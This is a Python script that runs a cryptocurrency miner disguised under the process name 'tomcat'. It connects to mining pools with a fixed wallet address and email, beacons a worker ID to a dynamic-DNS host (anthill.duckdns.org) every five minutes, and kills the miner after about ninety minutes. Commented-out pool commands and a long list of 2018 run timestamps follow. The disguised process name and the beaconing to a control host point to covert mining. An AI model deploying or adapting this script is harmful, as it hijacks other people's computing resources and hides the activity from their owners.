import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:01.526084
#2018-02-17 16:12:01.278704
#2018-02-17 18:00:08.106599
#2018-02-17 19:47:05.785284
#2018-02-17 21:34:07.229629
#2018-02-17 23:19:05.537348
#2018-02-18 01:07:02.107849
#2018-02-18 02:54:06.682567
#2018-02-18 04:43:06.156562
#2018-02-18 06:35:08.017678
#2018-02-18 08:24:05.127489
#2018-02-18 10:12:01.423397
#2018-02-18 11:58:06.860516
#2018-02-18 13:43:05.174205
#2018-02-18 15:35:08.539402
#2018-02-18 17:23:01.457002
#2018-02-18 19:11:06.308614
#2018-02-18 20:58:01.249531
#2018-02-18 22:43:03.830380
#2018-02-19 00:32:05.205368
#2018-02-19 02:17:05.160406
#2018-02-19 04:06:06.502722
#2018-02-19 05:50:07.541732
#2018-02-19 07:40:07.513356
#2018-02-19 09:30:08.925552
#2018-02-19 11:19:07.143093
#2018-02-19 13:07:05.246862
#2018-02-19 14:55:09.252284
#2018-02-19 16:44:09.087037
#2018-02-19 18:32:01.335147
#2018-02-19 20:19:07.942256
#2018-02-19 22:08:05.295510
#2018-02-19 23:54:07.880787
#2018-02-20 01:40:06.323306
#2018-02-20 03:28:06.943892
#2018-02-20 05:15:03.251860
#2018-02-20 06:57:07.679880
#2018-02-20 08:44:04.992068
#2018-02-20 10:28:06.580067
#2018-02-20 12:13:09.011588
#2018-02-20 14:01:01.605182
#2018-02-20 15:44:01.437109
#2018-02-20 17:31:04.543123
#2018-02-20 19:20:02.825141
#2018-02-20 21:08:07.113557
#2018-02-20 22:53:05.344859
#2018-02-21 00:35:07.637282
#2018-02-21 02:22:04.243194
#2018-02-21 04:08:03.303859
#2018-02-21 05:55:02.940188
#2018-02-21 07:43:13.298447
#2018-02-21 09:28:01.474387
#2018-02-21 11:17:06.021191
#2018-02-21 13:04:09.060516
#2018-02-21 14:51:01.476347
#2018-02-21 16:41:09.751264
#2018-02-21 18:32:07.055738
#2018-02-21 20:16:07.578106
#2018-02-21 22:04:05.113173
#2018-02-21 23:49:05.173896
#2018-02-22 01:38:07.819917
#2018-02-22 03:25:06.741771
#2018-02-22 05:12:02.230346
#2018-02-22 06:55:06.484644
#2018-02-22 08:41:05.043573
#2018-02-22 10:28:05.594231
#2018-02-22 12:16:01.860928
#2018-02-22 14:00:14.342172
#2018-02-22 15:47:09.690733
#2018-02-22 17:35:10.116626
#2018-02-22 19:21:05.841441
#2018-02-22 21:12:08.827404
#2018-02-22 22:57:07.293824
#2018-02-23 00:45:07.748828
#2018-02-23 02:34:01.843844
#2018-02-23 04:21:04.016549
#2018-02-23 06:08:01.629898
#2018-02-23 07:54:01.451254
#2018-02-23 10:11:04.384956
#2018-02-23 12:04:07.176860
#2018-02-23 13:51:09.214025
#2018-02-23 15:44:10.432820
#2018-02-23 17:30:05.111167
#2018-02-23 19:16:08.274885
#2018-02-23 20:59:07.608269
#2018-02-23 22:45:08.476938
#2018-02-24 00:32:04.444601
#2018-02-24 02:23:05.429586
#2018-02-24 04:14:05.819934
#2018-02-24 06:02:05.529071
#2018-02-24 07:49:06.894993
#2018-02-24 09:34:03.872016
#2018-02-24 11:27:06.638041
#2018-02-24 13:16:05.322973
#2018-02-24 15:07:06.260544
#2018-02-24 16:55:08.284114
#2018-02-24 18:44:06.171168
#2018-02-24 20:35:07.703095
#2018-02-24 22:39:03.959949
#2018-02-25 01:46:01.325339
#2018-02-25 04:59:07.332892
#2018-02-25 09:42:02.121400